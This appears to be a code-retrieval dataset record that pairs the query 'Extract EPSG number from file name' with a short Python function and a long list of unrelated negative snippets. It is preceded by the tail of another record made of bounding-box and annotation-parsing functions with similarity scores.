os.path.exists(image_path[:-4] + '_bb.txt'),'path not exists' + ' ' + image_path\n \n with open(image_path[:-4] + '_bb.txt','r') as f:\n material = f.readline()\n try:\n x,y,w,h,score = material.strip().split(' ')\n except:\n logging.info('Bounding Box of' + ' ' + image_path + ' ' + 'is wrong') \n\n try:\n w = int(float(w))\n h = int(float(h))\n x = int(float(x))\n y = int(float(y))\n w = int(w*(real_w / 224))\n h = int(h*(real_h / 224))\n x = int(x*(real_w / 224))\n y = int(y*(real_h / 224))\n\n # Crop face based on its bounding box\n y1 = 0 if y < 0 else y\n x1 = 0 if x < 0 else x \n y2 = real_h if y1 + h > real_h else y + h\n x2 = real_w if x1 + w > real_w else x + w\n img = img[y1:y2,x1:x2,:]\n\n except:\n logging.info('Cropping Bounding Box of' + ' ' + image_path + ' ' + 'goes wrong') \n\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n return img", "def get_label_info(xml_name):\n tar_path = os.path.join(get_data_dir(), 'atlas')\n label_list = get_info(os.path.join(tar_path, xml_name), 'label')\n return label_list", "def read_label_from_txt(label_path):\n text = np.fromfile(label_path)\n bounding_box = []\n with open(label_path, \"r\") as f:\n labels = f.read().split(\"\\n\")\n for label in labels:\n if not label:\n continue\n label = label.split(\" \")\n if (label[0] == \"DontCare\"):\n continue\n\n if label[0] == (\"Car\" or \"Van\"): # or \"Truck\"\n bounding_box.append(label[8:15])\n\n if bounding_box:\n data = np.array(bounding_box, dtype=np.float32)\n return data[:, 3:6], data[:, :3], data[:, 6]\n else:\n return None, None, None", "def read_label_from_txt(label_path):\n text = np.fromfile(label_path)\n bounding_box = []\n with open(label_path, \"r\") as f:\n labels = f.read().split(\"\\n\")\n for label in labels:\n if not label:\n continue\n label = label.split(\" \")\n if (label[0] == \"DontCare\"):\n continue\n\n if label[0] == (\"Car\" or \"Van\"): # or \"Truck\"\n bounding_box.append(label[8:15])\n\n if bounding_box:\n data = np.array(bounding_box, dtype=np.float32)\n return data[:, 3:6], data[:, :3], data[:, 6]\n else:\n return None, None, None", "def get_contour_bbox_from_raw(raw_mask):\n cnts = grab_contours(\n cv2.findContours(\n raw_mask, \n cv2.RETR_EXTERNAL, \n cv2.CHAIN_APPROX_SIMPLE\n ))\n xywhs = [cv2.boundingRect(cnt) for cnt in cnts]\n xys = [(xywh[0], xywh[1], xywh[0]+xywh[2], xywh[1]+xywh[3]) for xywh in xywhs]\n return sorted(xys, key=lambda x: (x[1], x[0]))", "def get_detection_bboxes(detector):\r\n with open('../datasets/AICity_data/train/S03/c010/det/det_' + detector + '.txt') as f:\r\n lines = f.readlines()\r\n bboxes = dict()\r\n num_of_instances = 0\r\n for line in lines:\r\n num_of_instances += 1\r\n line = (line.split(','))\r\n if line[0] in bboxes.keys():\r\n content = [int(float(elem)) for elem in line[1:6]]\r\n content.append(float(line[6])) # confidence score??????\r\n bboxes[line[0]].append(content)\r\n else:\r\n content = [int(float(elem)) for elem in line[1:6]]\r\n content.append(float(line[6]))\r\n bboxes[line[0]] = [content]\r\n return bboxes, num_of_instances", "def crop_inference_bbox(image, boxes, file_name=\"cropped_inference_result\"):\n # create output folder if not present\n create_dir(\"output/\")\n # crop detections\n if len(boxes) > 0:\n for ind in range(len(boxes)):\n cropped_img = image[\n int(boxes[ind][0][1]) : int(boxes[ind][1][1]),\n int(boxes[ind][0][0]) : int(boxes[ind][1][0]),\n :,\n ]\n save_path = os.path.join(\"output/\", file_name + \"_\" + str(ind) + \".png\")\n cv2.imwrite(save_path, cv2.cvtColor(cropped_img, cv2.COLOR_RGB2BGR))", "def get_bnd_info(self):\n nbor = self.nbor\n lihbor, liubor, livbor, _, _, _, _, \\\n litbor, _, _, _, _ = self.bnd_info\n\n return (nbor, lihbor, liubor, livbor, litbor)", "def get_bounding_box(current_building_contour):\n x, y, w, h, = cv.boundingRect(current_building_contour[0])\n return x, y, w, h", "def __read_img_file(filename, label):\n image = cv2.cvtColor(cv2.imread(filename), cv2.COLOR_BGR2RGB)\n height, width, _ = image.shape\n image = cv2.resize(image, (img_size, img_size))\n # A label is consist of [y1, x1, y2, x2, class_idx]\n label = np.reshape(label, (-1, 5))\n rel_bboxes = label[..., 0:4] / np.array([height, width, height, width], np.float32)\n label = np.concatenate([rel_bboxes, np.expand_dims(label[..., -1], 1)], axis=-1)\n return image, label", "def getFeaturesByBBox(self,bboxtuple, srsname):\n raise NotImplementedError", "def unpack_box(self, idx, struct):\r\n\r\n attributes = ['label', 'height', 'width', 'top', 'left']\r\n\r\n # Instantiate metadata dict for each image\r\n metadata = {attr: [] for attr in attributes}\r\n\r\n # This function retreives each data point corresponding to a bounding box\r\n def get_attrs(attr, obj):\r\n vals = []\r\n if obj.shape[0] == 1:\r\n vals.append(int(obj[0][0]))\r\n else:\r\n for k in range(obj.shape[0]):\r\n vals.append(int(struct[obj[k][0]][0][0]))\r\n\r\n metadata[attr] = vals\r\n\r\n # Get bounding box metadata for an image\r\n box = struct['/digitStruct/bbox'][idx]\r\n struct[box[0]].visititems(get_attrs)\r\n\r\n return metadata", "def get_bbox(self):\n z2p = 64 # zoomFactor to bbox radius in pixels @ MIP0\n pos = Vec(*self.get_position())\n zoom = self.get_zoom()\n return Bbox(pos-Vec(z2p*zoom, z2p*zoom, 0), \n pos+Vec(z2p*zoom, z2p*zoom, 1))", "def fix_bbox(bbox,img_shape):\n x = min(bbox[1][0],img_shape[1])\n y = min(bbox[1][1],img_shape[0])\n return ((bbox[0]),(x,y))", "def get_bbox(frame_data, camera_image_data):\n object_decodification = {0: 'unkown', 1: 'vehicle', 2: 'pedestrian', 3: 'sign', 4: 'cyclist'}\n bbox = {}\n valid_bb_data = True\n if not frame_data.camera_labels:\n valid_bb_data = False\n # Draw the camera labels.\n for camera_labels in frame_data.camera_labels:\n # Ignore camera labels from other views (i.e. I want Front but it also gives left, right, front left, ...)\n if camera_labels.name != camera_image_data.name:\n continue\n # Iterate over the individual labels\n for label in camera_labels.labels:\n if label.detection_difficulty_level == 0:\n difficulty = \"easy\"\n elif label.detection_difficulty_level == 2:\n difficulty = \"hard\"\n\n if label.tracking_difficulty_level == 0:\n tracking_level = \"easy\"\n elif label.tracking_difficulty_level == 2:\n tracking_level = 'hard'\n\n object_class = object_decodification[label.type]\n # I'm not saving the other labels so that it matches my CARLA dataset\n if object_class not in bbox and (object_class == \"vehicle\" or object_class == \"pedestrian\"):\n bbox[object_class] = []\n \n if (object_class == \"vehicle\" or object_class == \"pedestrian\"):\n # Get BB\n xmin = int(label.box.center_x - 0.5 * label.box.length)\n ymin = int(label.box.center_y - 0.5 * label.box.width)\n xmax = int(xmin + label.box.length)\n ymax = int(ymin + label.box.width)\n bbox[object_class].append([xmin, ymin, xmax, ymax, difficulty, tracking_level])\n return bbox, valid_bb_data", "def getElementName(self):\n return _libsbml.BoundingBox_getElementName(self)", "def get_boundingbox(face, width, height, scale=1.3, minsize=None):\n x1 = face.left()\n y1 = face.top()\n x2 = face.right()\n y2 = face.bottom()\n size_bb = int(max(x2 - x1, y2 - y1) * scale)\n if minsize:\n if size_bb < minsize:\n size_bb = minsize\n center_x, center_y = (x1 + x2) // 2, (y1 + y2) // 2\n\n # Check for out of bounds, x-y top left corner\n x1 = max(int(center_x - size_bb // 2), 0)\n y1 = max(int(center_y - size_bb // 2), 0)\n # Check for too big bb size for given x, y\n size_bb = min(width - x1, size_bb)\n size_bb = min(height - y1, size_bb)\n\n return x1, y1, size_bb", "def get_bb(node_name):\n return int(re.search(r'\\d+', re.search(r'block_\\d+', node_name).group()).group())", "def parse_file_name(filename):\n import re\n rgx = r'bin_thresh_([0-9]+).*n_bins_([0-9]+)'\n m = re.search(rgx, filename)\n if m:\n logging.debug('Matching \\'{}\\' to \\'{}\\' worked: {}'.format(rgx, filename, m.groups()))\n return [int(m.group(i)) for i in [1,2]]\n\n logging.warning('Could not match \\'{}\\' to \\'{}\\''.format(rgx, filename))\n return -1,-1", "def _sourceBoundingBox(self, source, width, height):\n pos = source.get('position')\n bbox = {'left': 0, 'top': 0, 'right': width, 'bottom': height}\n if not pos:\n return bbox\n x0, y0, x1, y1 = 0, 0, width, height\n if 'crop' in pos:\n x0 = min(max(pos['crop'].get('left', x0), 0), width)\n y0 = min(max(pos['crop'].get('top', y0), 0), height)\n x1 = min(max(pos['crop'].get('right', x1), x0), width)\n y1 = min(max(pos['crop'].get('bottom', y1), y0), height)\n bbox['crop'] = {'left': x0, 'top': y0, 'right': x1, 'bottom': y1}\n corners = np.array([[x0, y0, 1], [x1, y0, 1], [x0, y1, 1], [x1, y1, 1]])\n m = np.identity(3)\n m[0][0] = pos.get('s11', 1) * pos.get('scale', 1)\n m[0][1] = pos.get('s12', 0) * pos.get('scale', 1)\n m[0][2] = pos.get('x', 0)\n m[1][0] = pos.get('s21', 0) * pos.get('scale', 1)\n m[1][1] = pos.get('s22', 1) * pos.get('scale', 1)\n m[1][2] = pos.get('y', 0)\n if not np.array_equal(m, np.identity(3)):\n bbox['transform'] = m\n try:\n bbox['inverse'] = np.linalg.inv(m)\n except np.linalg.LinAlgError:\n msg = 'The position for a source is not invertable (%r)'\n raise TileSourceError(msg, pos)\n transcorners = np.dot(m, corners.T)\n bbox['left'] = min(transcorners[0])\n bbox['top'] = min(transcorners[1])\n bbox['right'] = max(transcorners[0])\n bbox['bottom'] = max(transcorners[1])\n return bbox", "def get_path_bounding_box(self, image) -> BoundingBox:\n return NNManager.get_yolo_model(\"path\").predict(image)", "def get_bbox(self):\n return (self.get_handler().PROCESSING_LIMIT_WEST,\n self.get_handler().PROCESSING_LIMIT_SOUTH,\n self.get_handler().PROCESSING_LIMIT_EAST,\n self.get_handler().PROCESSING_LIMIT_NORTH\n )", "def read_binning_file(file_name, lmax):\n\n bin_lo,bin_hi,bin_c = plt.loadtxt(file_name,unpack=True)\n id = np.where(bin_hi <lmax)\n bin_lo,bin_hi,bin_c=bin_lo[id],bin_hi[id],bin_c[id]\n if bin_lo[0]<2:\n bin_lo[0]=2\n bin_hi=bin_hi.astype(np.int)\n bin_lo=bin_lo.astype(np.int)\n bin_size=bin_hi-bin_lo+1\n return (bin_lo,bin_hi,bin_c,bin_size)", "def unpack_annotation(path):\n buffer = []\n with open(path, 'r') as file:\n lines = file.read()\n\n lines = lines.splitlines()\n for line in lines:\n if not line.startswith('#') and line:\n buffer.append(line)\n\n # Filename to match annotation with photo\n filename = ''\n for line in buffer:\n if 'Image filename' in line:\n filename = line.replace(' ', '').split(':')[1]\n\n # How many person-like objects in photo\n how_many = 0\n for line in buffer:\n if 'Objects with ground truth' in line:\n how_many = int((line.replace(' ', '').split(':')[1][0]))\n break\n\n person_id = []\n for i in range(how_many):\n person_id.append(f'{i+1} \"PASperson\"')\n\n # Centers of objects\n centers = []\n which_one = 0\n for line in buffer:\n if which_one == how_many:\n break\n if person_id[which_one] + ' (X, Y)' in line:\n buf = line.replace(\" \", \"\").split(':')[1]\n buf = buf.replace('(', \"\").replace(')', '').split(',')\n centers.append((int(buf[0]), int(buf[1])))\n which_one += 1\n\n # Bounding boxes of objects\n boxes = []\n which_one = 0\n for line in buffer:\n if which_one == how_many:\n break\n if person_id[which_one] + ' (Xmin, Ymin)' in line:\n buf = line.replace(\" \", \"\").split(':')[1]\n buf = buf.replace('(', \"\").replace(')', '').split('-')\n buf0 = buf[0].split(',')\n buf1 = buf[1].split(',')\n boxes.append((int(buf0[0]), int(buf0[1]), int(buf1[0]), int(buf1[1])))\n which_one += 1\n\n return filename, how_many, centers, boxes", "def parse_labelbox_boxes(IMAGE_PATH, ANNOTATION_FILEPATH, CLASS_NAMES):\n IMAGE_PATH = make_abs_path(IMAGE_PATH)\n annotation_data = json.loads(open(ANNOTATION_FILEPATH).read())\n images = []\n boxes = {name:[] for name in CLASS_NAMES}\n for image_data in annotation_data:\n image_file = image_data.get('External ID')\n images.append(io.imread(IMAGE_PATH + image_file))\n image_boxes = {name: [] for name in CLASS_NAMES}\n for obj in image_data.get(\"Label\",{}).get(\"objects\",[]):\n object_name = obj.get('title','').lower()\n if object_name not in CLASS_NAMES:\n continue\n label_box = obj.get('bbox',{})\n image_boxes[object_name].append(\n dlib.rectangle(left=long(label_box.get(\"left\")), top=long(label_box.get(\"top\")), right=long(label_box.get(\"width\")), bottom=long(label_box.get(\"height\")))\n )\n for class_name in CLASS_NAMES:\n boxes[class_name].append(image_boxes[class_name])\n\n return images, boxes", "def parseFilename(fileName):\n # regex to match names like Axis-BaldCA_2018-05-29T16_02_30_129496.jpg\n # and bm-n-mobo-c__2017-06-25z11;53;33.jpg\n regexExpanded = '([A-Za-z0-9-_]+[^_])_+(\\d{4}-\\d\\d-\\d\\d)T(\\d\\d)[_;](\\d\\d)[_;](\\d\\d)'\n # regex to match diff minutes spec for subtracted images\n regexDiff = '(_Diff(\\d+))?'\n # regex to match optional crop information e.g., Axis-Cowles_2019-02-19T16;23;49_Crop_270x521x569x820.jpg\n regexOptionalCrop = '(_Crop_(-?\\d+)x(-?\\d+)x(\\d+)x(\\d+))?'\n matchesExp = re.findall(regexExpanded + regexDiff + regexOptionalCrop, fileName)\n # regex to match names like 1499546263.jpg\n regexUnixTime = '(1\\d{9})'\n matchesUnix = re.findall(regexUnixTime + regexDiff + regexOptionalCrop, fileName)\n cropInfo = None\n if len(matchesExp) == 1:\n match = matchesExp[0]\n parsed = {\n 'cameraID': match[0],\n 'date': match[1],\n 'hours': match[2],\n 'minutes': match[3],\n 'seconds': match[4]\n }\n isoStr = '{date}T{hour}:{min}:{sec}'.format(date=parsed['date'],hour=parsed['hours'],min=parsed['minutes'],sec=parsed['seconds'])\n dt = dateutil.parser.parse(isoStr)\n unixTime = int(dt.timestamp())\n parsed['diffMinutes'] = int(match[6] or 0)\n cropInfo = match[-4:]\n elif len(matchesUnix) == 1:\n match = matchesUnix[0]\n unixTime = int(match[0])\n dt = datetime.datetime.fromtimestamp(unixTime)\n isoStr = datetime.datetime.fromtimestamp(unixTime).isoformat()\n parsed = {\n 'cameraID': 'UNKNOWN_' + fileName,\n 'date': dt.date().isoformat(),\n 'hours': str(dt.hour),\n 'minutes': str(dt.minute),\n 'seconds': str(dt.second)\n }\n parsed['diffMinutes'] = int(match[2] or 0)\n cropInfo = match[-4:]\n else:\n logging.error('Failed to parse name %s', fileName)\n return None\n if cropInfo[0]:\n parsed['minX'] = int(cropInfo[0])\n parsed['minY'] = int(cropInfo[1])\n parsed['maxX'] = int(cropInfo[2])\n parsed['maxY'] = int(cropInfo[3])\n parsed['isoStr'] = isoStr\n parsed['unixTime'] = int(unixTime)\n return parsed", "def repackFileName(parsedName):\n cropCoords = None\n if 'minX' in parsedName:\n cropCoords=(parsedName['minX'], parsedName['minY'], parsedName['maxX'], parsedName['maxY'])\n return getImgPath('', parsedName['cameraID'], parsedName['unixTime'],\n cropCoords=cropCoords,\n diffMinutes=parsedName['diffMinutes'])", "def getBoundingBox(shp):\r\n if not isinstance(shp, geopandas.geodataframe.GeoDataFrame):\r\n shp = geopandas.read_file(shp)\r\n xmin = shp.bounds['minx'][0]\r\n xmax = shp.bounds['maxx'][0]\r\n ymin = shp.bounds['miny'][0]\r\n ymax = shp.bounds['maxy'][0]\r\n\r\n return [xmin, ymin, xmax, ymax]", "def optimize_bbox(img_shape,\n bbox,\n edge_width=8):\n (rows,columns) = img_shape\n (x1,y1,x2,y2) = bbox\n\n return max(0,x1-edge_width),max(0,y1-edge_width),min(rows-1,x2+edge_width),min(columns-1,y2+edge_width)", "def bbox(self, obj):\n return self.phy2abs.bbox(obj)", "def bbox(self):\n return self._bbox", "def get_bbox(x,y, buffer=0.):\n return dict(left=np.min(x), \n right=np.max(x), \n bottom=np.min(y), \n top=np.max(y))", "def bbox_from_openpose(openpose_file, rescale=1.2, detection_thresh=0.2):\n with open(openpose_file, 'r') as f:\n keypoints = json.load(f)['people'][0]['pose_keypoints_2d']\n keypoints = np.reshape(np.array(keypoints), (-1,3))\n valid = keypoints[:,-1] > detection_thresh\n valid_keypoints = keypoints[valid][:,:-1]\n center = valid_keypoints.mean(axis=0)\n bbox_size = (valid_keypoints.max(axis=0) - valid_keypoints.min(axis=0)).max()\n # adjust bounding box tightness\n scale = bbox_size / 200.0\n scale *= rescale\n return center, scale", "def bbox_from_openpose(openpose_file, rescale=1.2, detection_thresh=0.2):\n with open(openpose_file, 'r') as f:\n keypoints = json.load(f)['people'][0]['pose_keypoints_2d']\n keypoints = np.reshape(np.array(keypoints), (-1,3))\n valid = keypoints[:,-1] > detection_thresh\n valid_keypoints = keypoints[valid][:,:-1]\n center = valid_keypoints.mean(axis=0)\n bbox_size = (valid_keypoints.max(axis=0) - valid_keypoints.min(axis=0)).max()\n # adjust bounding box tightness\n scale = bbox_size / 200.0\n scale *= rescale\n return center, scale", "def boundingRect(cnt):\n\tx, y, w, h = cv2.boundingRect(cnt)\n\treturn {\"x\":x, \"y\": y, \"w\": w, \"h\": h}", "def extract_name(text):\n name = re.sub(r\"<br>\", \"\", text)\n name = re.sub(r\"\\(\\d\\.\\d\\)\", \"\", name)\n return name" ]
[ "0.7414556", "0.73649496", "0.71413463", "0.6696102", "0.62867755", "0.6165321", "0.6104715", "0.59432495", "0.59432495", "0.59264004", "0.59072345", "0.59054977", "0.5792332", "0.5791462", "0.577605", "0.56787", "0.5672523", "0.5659785", "0.5647485", "0.56438744", "0.5634939", "0.56093234", "0.55983853", "0.55979973", "0.556724", "0.55332816", "0.5486267", "0.54659766", "0.54580766", "0.54553646", "0.5437434", "0.542988", "0.5428227", "0.54176503", "0.54163903", "0.5409484", "0.5404987", "0.5396085", "0.53905827", "0.5357094", "0.53273004", "0.5316445", "0.5292879", "0.52091867", "0.51833105", "0.5170589", "0.5160073", "0.5151612", "0.51450187", "0.513637", "0.51344365", "0.5129685", "0.5121901", "0.50986105", "0.50804913", "0.5075868", "0.5060085", "0.50511724", "0.5046792", "0.50413024", "0.5039114", "0.50359815", "0.50306916", "0.501262", "0.50110114", "0.5008893", "0.500265", "0.500265", "0.5000502", "0.4997186", "0.49962297", "0.49893793", "0.49869215", "0.49761775", "0.49737465", "0.49729395", "0.4972186", "0.4955364", "0.49479806", "0.49399504", "0.4925214", "0.49246854", "0.4915893", "0.49142054", "0.49052826", "0.48804337", "0.48799646", "0.48798898", "0.4878928", "0.48734272", "0.48690715", "0.48684075", "0.4867839", "0.48642847", "0.48595428", "0.48588294", "0.48502856", "0.48502856", "0.48457915", "0.48437372" ]
0.7516535
0
Extract EPSG number from file name.
def get_proj(fname): fname = fname.split('_') # fname -> list i = fname.index('epsg') return fname[i+1]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_proj(fname):\r\n\r\n fname = fname.split('_') # fname -> list\r\n i = fname.index('epsg')\r\n return fname[i+1]", "def _epsg(self):\n info = self._info['coordinateSystem']['wkt'].rsplit('\"EPSG\",', 1)[-1]\n return int(re.findall(r\"\\d+\", info)[0])", "def get_version_filename(filename):\n return re.search(r'\\d+', filename).group(0)", "def get_num_from_file(file_name):\n basename = file_name.partition('.')[0]\n first, second = basename.split('_')\n num = second.replace(\"genome\", '')\n num = num[1:]\n return int(num)", "def filename_from(url):\n filename = url.split('/')[-1]\n return filename", "def extract_filename(str):\n regex = r\"([0-9_-]+).jpg\"\n matches = re.search(regex, str)\n if matches:\n return matches.group(1)", "def get_radius_from_grfile(grfile, default=0):\n match = re.findall('(\\d+)', grfile)\n if len(match) > 0 and str(grfile).endswith(str(match[-1]) + '.gr'):\n return int(match[-1])\n return default", "def parseFilename(self, filename):\r\n match = self.filename_regex.match(filename)\r\n if match is None:\r\n # TODO?: Raise exception?\r\n '''print \"Filename\", filename, \"unrecognized!\"'''\r\n return None\r\n lat = int(match.group(2))\r\n lon = int(match.group(4))\r\n if match.group(1) == \"S\":\r\n lat = -lat\r\n if match.group(3) == \"W\":\r\n lon = -lon\r\n return lat, lon", "def get_ens_num(file):\n f = 'ens' + '(\\d+)'\n match = re.search(f, file)\n if match:\n return int(match.group(1))", "def parse_num(path):\n nbasename = path.basename.lower()\n if nbasename.startswith(nprefix):\n try:\n return int(nbasename[len(nprefix) :])\n except ValueError:\n pass", "def get_filename(url: str) ->str:\n if 'drive.google.com' in url:\n return _extract_google_drive_file_id(url)\n url, filename = os.path.split(url)\n return filename or os.path.basename(url)", "def extract_file_extension(url_file):\n pattern = re.split(\"\\.\",url_file)\n return pattern[-1]", "def _filename_from_url(url):\n file_name = url.split(\"/\")[-1]\n return file_name", "def filename(self):\n _, tail = os.path.split(self.url)\n return self.folder + '/' + tail[:-4] + '/' + tail[:-3] + 'shp'", "def _get_file_name(url: str) -> str:\n url = url.strip('/')\n result = findall(r'/(\\w+\\.\\w+)[?|$]', url)\n if result:\n return result[-1]\n return url.split('/')[-1]", "def get_extension_from_filename(filename):\n return filename[-4:]", "def url_file_name(url):\r\n return url[url.rfind('/') + 1:]", "def extract_id(file_path):\n # An example of file path is AlkEthOH_tripos/AlkEthOH_chain_filt1/AlkEthOH_c555.crd\n return os.path.splitext(os.path.basename(file_path))[0][9:]", "def get_name_from_filename(filename):\n return filename[:-4]", "def extract_filefamilyname( self, filename ):\n matchobject = re.search( r\"^.*_\\d\\d\", filename )\n if matchobject is None:\n return filename\n else:\n familyname = filename[0:(matchobject.end()-3)]\n return familyname", "def filename(self,imgurl):\n if imgurl.find('/'):\n return imgurl.rsplit('/', 1)[1]", "def get_name_from_file(filename):\n return filename.split(\".\")[0]", "def filename(self):\n return os.path.basename(self._spatial_filename)", "def get_imageId_from_fileName(filename, id_iter):\n filename = os.path.splitext(filename)[0]\n if filename.isdigit():\n return int(filename)\n return id_iter", "def get_imageId_from_fileName(filename):\n filename = os.path.splitext(filename)[0]\n if filename.isdigit():\n return int(filename)\n return id_iter", "def get_filename(self) -> str:\n fname = self.url.split(\"/\")[-1]\n if \",\" in fname:\n _fname, _i = fname.split(\",\")\n _split_fname = _fname.split(\".\")\n _name = _split_fname[0]\n _extension = _split_fname[-1]\n return _name + _i + \".\" + _extension\n else:\n return fname", "def return_episode_num(name):\n return int(name.split(\".\")[0].split(\"ep_\")[1]) # Use split to return only the episode number needed to sort the files in increasing order", "def filename_par(filename, searchstr):\n\tstart = filename.find(searchstr) + len(searchstr)\n\tfinish = start + 1\n\twhile unicode(filename[start:].replace(\".\",\"\"))[:finish-start].isnumeric():\n\t\tfinish += 1\n\treturn float(filename[start:finish-1])", "def Get_epsg(g, extension = 'tiff'):\n try:\n if extension == 'tiff':\n # Get info of the dataset that is used for transforming\n try:\n dest = gdal.Open(g)\n except:\n dest = g\n g_proj = dest.GetProjection()\n Projection=g_proj.split('EPSG\",\"')\n epsg_to=int((str(Projection[-1]).split(']')[0])[0:-1])\n \n if extension == 'GEOGCS':\n Projection = g\n epsg_to=int((str(Projection).split('\"EPSG\",\"')[-1].split('\"')[0:-1])[0])\n\n except:\n epsg_to=4326\n #print 'Was not able to get the projection, so WGS84 is assumed'\n \n return(epsg_to)", "def _get_aso_id_from_file_name(self, filename: str) -> str:\n id_parts = filename.split('/')\n prefix = id_parts[1]\n suffix = id_parts[-1].split('.')[0].zfill(3)\n if len(suffix) == 5:\n return suffix\n else:\n return prefix + suffix", "def part2(filename: str) -> int:\n data = parse(filename)\n return index_of_floor(data, -1)", "def get_ext(url):\r\n root, ext = splitext(url)\r\n return ext", "def get_revision(name):\n #return name[-6:-4]\n base,ext = os.path.splitext(name)\n return base[-2:]", "def getNumberFromName(self, idx):\n\t\tfile = self.all_file_names[idx]\n\t\tnumber = file[4]\n\t\tif file[5].isdigit(): \n\t\t\tnumber += file[5]\n\t\treturn int(number)", "def find_coords_string(file_path):\n\n match = re.search(\n \"([-]?[\\d]{1,3}\\.[\\d]{1,3}[_,][-]?[\\d]{1,3}\\.[\\d]{1,3})\", file_path\n )\n if not match:\n return None\n coords_string = match.groups()[0]\n return coords_string", "def get_file_ext(filename):\n return filename.rsplit('.', 1)[1]", "def _parse_id(line):\n ablt_pat = re.compile('(?<=2014_)[0-9]{12}(?=.jpg)')\n orig_pat = re.compile('(?<=[0-9]{16}_)[0-9]+')\n mat = ablt_pat.search(line)\n if mat is None: #original image\n mat = orig_pat.search(line)\n assert not mat is None, (\"this line does not contain a COCO image id: {}\" % line )\n return line[mat.start(): mat.end()], 'orig'\n else: #ablated image\n num = line[mat.start(): mat.end()]\n return str(int(num)), 'ablt'", "def name_from_path(path):\n return path[0:-3]", "def getExtension(filename):\n return filename[filename.rfind('.'):]", "def extract_name(text):\n name = re.sub(r\"<br>\", \"\", text)\n name = re.sub(r\"\\(\\d\\.\\d\\)\", \"\", name)\n return name", "def _get_tweet_number(tweet_url):\n path = urlparse.urlparse(tweet_url)[2]\n number = path.split('/')[-1]\n return '#%s' % (number,)", "def get_extension(filename: str) -> str:\n return filename.split(\".\")[-1]", "def fileId_from_url(url):\r\n raw_fileId = re.findall(\"~[A-z.]+/[0-9]+\", url)[0][1:]\r\n return raw_fileId.replace('/', ':')", "def _extract_identifier(self, publication):\n return self._parse_identifier(publication.metadata.identifier)", "def fileId_from_url(url):\r\n raw_fileId = re.findall(\"~[0-z.]+/[0-9]+\", url)[0][1: ]\r\n return raw_fileId.replace('/', ':')", "def generate_site_file_num(paper_name:str, file_num:str='auto') -> str:\n if type(file_num)==str and file_num=='auto':\n files = [f.split('_')[0] for f in os.listdir(paper_name) if '_sites.json' in f]\n nums = [0]\n for f in files:\n r = re.findall(r'\\d+', f)\n if r and len(r)>0: nums.append(int(r[-1]))\n else: nums.append(0)\n file_num = sorted(nums, reverse=True)[0]+1\n return str(file_num)", "def id_from_url(url):\n return url.split('-')[-1].split('.html')[0]", "def parse_filename(url):\n # extract the URL path\n url_path = urlparse.urlparse(url).path\n filename = url_path.split('/')[-1]\n\n # make loose assumption the file name is for an HTML page\n if len(filename) < 1:\n filename = 'index.html'\n\n return filename", "def url_filename(url):\n return os.path.basename(urlparse.urlparse(url).path)", "def parse_filename(cls, filename):\n words = filename.split('_')\n return words[0], int(words[1][1:]), int(words[2])", "def get_image_index(name: str):\n base_name = os.path.basename(name)\n nums = pattern.findall(base_name)\n if len(nums) != num_count:\n raise BaseException(f\"can't exact index from the string: {name}\")\n return float(nums[num_sort_index])", "def file_name(path):\n return os.path.basename(path).split('.')[0]", "def extract_journal(name):\n match = re.search(\"\\d+\", name)\n if match != None: \n return name[:match.start()], int(name[match.start(): match.end()])\n else: \n return \"\", 0", "def _get_track_name(self, filename):\n return os.path.basename(filename)", "def get_filename(img_path):\n filename = os.path.splitext(img_path)\n return os.path.basename(filename[0])", "def get_year(url):\n year = re.search(\"\\d{4}\", url).group(0)\n return int(year)", "def parse_glider_filename(filename):\n head, tail = os.path.split(filename)\n\n matches = re.search(r\"([\\w\\d\\-]+)-(\\d+)-(\\d+)-(\\d+)-(\\d+)\\.(\\w+)$\", tail)\n\n if matches is not None:\n return {\n 'path': head,\n 'glider': matches.group(1),\n 'year': int(matches.group(2)),\n 'day': int(matches.group(3)),\n 'mission': int(matches.group(4)),\n 'segment': int(matches.group(5)),\n 'type': matches.group(6)\n }\n else:\n raise ValueError(\n \"Filename ({}) not in usual glider format: \"\n \"<glider name>-<year>-<julian day>-\"\n \"<mission>-<segment>.<extenstion>\".format(filename)\n )", "def get_epsg(path):\n dataset = None\n layer = None\n srs = None\n try:\n\n driver = ogr.GetDriverByName('ESRI Shapefile')\n dataset = driver.Open(path, 0) # 0 means read-only\n layer = dataset.GetLayer()\n srs = layer.GetSpatialRef()\n #Set EPSG authority info if possible.\n srs.AutoIdentifyEPSG()\n return srs.GetAuthorityCode(None)\n\n finally:\n if srs: srs = None\n if layer: layer = None\n if dataset: dataset = None", "def get_script_name ( filename ):\n prio, sepa, name = filename.partition ( '-' )\n if name:\n try:\n prio_int = int ( prio, 10 )\n except ValueError:\n return filename\n else:\n return name\n else:\n return filename", "def get_projection(g, extension = 'tiff'):\n if isinstance(g, str):\n try:\n g = gdal.Open(g)\n print(type(g))\n except:\n print('path is not correct')\n else:\n pass\n # assert isinstance(g ,gdal.Dataset)\n try:\n if extension == 'tiff':\n # Get info of the dataset that is used for transforming\n g_proj = g.GetProjection()\n srs = osr.SpatialReference()\n srs.ImportFromWkt(g_proj)\n epsg_to = srs.ExportToProj4()\n else:\n epsg_to = \"+proj=longlat +datum=WGS84 +no_defs\"\n print('Was not able to get the projection, so WGS84 is assumed')\n except:\n epsg_to = \"+proj=longlat +datum=WGS84 +no_defs\"\n print('Was not able to get the projection, so WGS84 is assumed')\n return epsg_to", "def get_ext(url):\n\n path = urlparse(url).path\n ext = splitext(path)[1]\n return ext", "def extract_item_id(url):\n m = re.search('/([0-9]+)\\.htm', url)\n if m is not None:\n return m.group(1)\n else:\n return None", "def get_year(self, filename):\n year = self.file.replace('s24_', '').replace('.vrt', '')\n self.logger.info(f'This .vrt file contains data for the year {year}')\n return year", "def ld8_extract(self, text):\n return re.search('\\d{5}_\\d{8}', text).group(0)", "def get_filename_extension(filename):\n m = FILENAME_EXTENSION_RE.search(filename)\n return m.group(1) if m else None", "def get_filename(link):\r\n return link[link.rfind(\"/\") + 1:]", "def get_filename(path):\n return path.split('/')[-1]", "def just_the_name(path):\n return os.path.splitext(os.path.basename(path))[0]", "def extract_file_name(file_path):\n # ファイルパスからファイル名(拡張子含む)を取り出す\n file_name = file_path.split('/')[-1]\n # 拡張子を取り除く\n return file_name.split('.')[0]", "def get_filename(filename):\n \n return utilities.get_filename(filename)", "def _get_abgp_file_basename(OPTIONS):\n if OPTIONS.target:\n try:\n num_loci = OPTIONS.selected_num_loci\n except:\n num_loci = len(OPTIONS.loci) + len(OPTIONS.dnafiles)\n return \"%s.%s%sSL.\" % (ABFGP_VERSION,OPTIONS.target,num_loci)\n else:\n 